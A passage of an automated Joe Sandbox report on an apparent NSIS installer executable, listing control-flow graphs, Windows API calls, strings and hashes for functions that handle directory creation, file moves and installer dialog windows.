                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                            • String ID: jF
                                                                                                                                            • API String ID: 2295610775-3349280890
                                                                                                                                            • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                            • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                            • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                            • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                            • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 310444273-0
                                                                                                                                            • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                            • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                            • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                            • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                            APIs
                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                            • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                            • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                            • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                            • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                            • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                            • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                            Strings
                                                                                                                                            • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                            • Call: %d, xrefs: 0040165A
                                                                                                                                            • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                            • Rename failed: %s, xrefs: 0040194B
                                                                                                                                            • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                            • Sleep(%d), xrefs: 0040169D
                                                                                                                                            • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                            • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                            • Aborting: "%s", xrefs: 0040161D
                                                                                                                                            • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                            • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                            • BringToFront, xrefs: 004016BD
                                                                                                                                            • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                            • Jump: %d, xrefs: 00401602
                                                                                                                                            • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                            • Rename: %s, xrefs: 004018F8
                                                                                                                                            • detailprint: %s, xrefs: 00401679
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                            • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                            • API String ID: 2872004960-3619442763
                                                                                                                                            • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                            • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                            • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                            • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                            APIs
                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                            • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                            • DestroyWindow.USER32 ref: 00405512
                                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                            • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                            • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3282139019-0
                                                                                                                                            • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                            • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                            • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                            • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                            • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                            • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                            • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                            • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                            • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                              • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                            • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                            • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                            • API String ID: 608394941-2746725676
                                                                                                                                            • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                            • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                            • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                            • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,TournamentsDefenceBerry,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,TournamentsDefenceBerry,TournamentsDefenceBerry,00000000,00000000,TournamentsDefenceBerry,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426979,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                            • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TournamentsDefenceBerry
                                                                                                                                            • API String ID: 4286501637-2571119049
                                                                                                                                            • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                            • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                            • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                            • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
